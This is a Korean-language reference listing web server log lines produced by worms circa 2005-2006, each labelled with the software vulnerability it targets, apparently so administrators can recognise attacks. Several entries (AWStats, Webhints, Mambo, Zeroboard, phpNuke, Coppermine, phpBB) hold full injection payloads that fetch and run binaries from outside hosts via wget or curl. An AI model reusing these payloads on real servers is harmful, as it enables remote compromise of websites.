Worm에 의해 발생하는 Log들

1. 웹로그 분석툴 AWStats의 취약점을 이용한 공격

203.194.xxx.xx - - [17/Jan/2006:02:09:04 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 0

2. PHP용 XML-RPC의 Remote Code Injection 취약점을 이용한 공격

203.194.xxx.xx - - [17/Jan/2006:02:09:09 +0900] "POST /xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:10 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 0
203.194.xxx.xx - - [17/Jan/2006:02:09:11 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 0

3. XML-RPC 취약점을 이용한 공격 2
218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /adxmlrpc.php HTTP/1.0" 404 0 "-"
218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 0 "-"

4. Darryl Burgdorf Webhints 취약점을 이용한 공격

219.239.xxx.xx - - [20/Dec/2005:04:17:10 +0900] "GET /cgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0

5. CMS 툴인 Mambo 취약점을 이용한 공격

213.203.xxx.xx - - [10/Jan/2006:17:59:50 +0900] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 400 299  

1. Zeroboard의 zero_vote 테마의 취약점을 이용한 공격

211.42.x.x - - [02/Dec/2005:09:53:33 +0900] "GET //bbs/skin/zero_vote/error.php?dir=http://211.xxx.xxx.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.xxx.xxx.126/tagg;perl%20tagg HTTP/1.1" 404 0

2. phpNuke 취약점을 이용한 공격

216.72.xxx.xxx - - [07/Jan/2006:09:44:59 +0900] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.xxx.xxx.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.xxx.xxx.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1" 404 0

3. phpNuke/postNuke의 Coppermine 포토갤러리 모듈 취약점을 이용한 공격

200.75.xx.xx - - [06/Jan/2006:10:16:50 +0900] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://209.xxx.xxx.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.xxx.xxx.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 0

4. Open WebMail 취약점을 이용한 공격 (취약점이 있는 버전인지 파악하기 위한 요청으로 판단됨)

203.190.xxx.xxx - - [01/Feb/2006:01:51:25 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

5. WebCalendar의 send_reminders.php 취약점을 이용한 공격

65.203.xxx.xxx - - [05/Dec/2005:02:34:23 +0900] "GET /webcalendar/tools/send_reminders.php?includedir=http://www.gxxxxes.com/trustopt/t.txt? HTTP/1.1" 404 0

6. RRDtool 기반의 트래픽 분석툴 Cacti의 graph_image.php 취약점을 이용한 공격

66.14.xxx.xx - - [01/Dec/2005:01:03:22 +0900] "GET /cacti/graph_image.php HTTP/1.1" 404 0

7. ATD OpenSSL 취약점 스캐닝 툴에 의한 로그

11.53.xxx.x - - [01/Dec/2005:00:49:31 +0900] "GET /sumthin HTTP/1.0" 404 0

8. Cisco Switch의 아주 예전 HTTP 취약점(2001년)을 이용한 공격

211.115.xxx.xx - - [27/Feb/2006:13:39:22 +0900] "GET /level/16/exec/-///pwd  HTTP/1.0" 404 0 "-"

9. 프락시 서버로 활용하기 위한 요청

220.137.xx.xxx - - [12/Dec/2005:05:07:19 +0900] "CONNECT msa-mx6.hinet.net:25 HTTP/1.0" 405 231

10. Microsoft의 FrontPage Server Extensions의 취약점을 이용한 공격

85.224.xxx.xx - - [01/Dec/2005:00:33:20 +0900] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0

11. phpBB의 viewtopic.php 취약점을 이용한 공격

130.63.xxx.xxx - - [23/Feb/2006:23:26:52 +0900] "GET /bbs/viewtopic.php?t=1112&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 302 642 "-" "Mozilla/4.0"

12. phpMyAdmin의 취약점을 이용한 공격

81.5.xxx.xxx - - [17/Mar/2006:12:12:57 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 0 "PMAFind"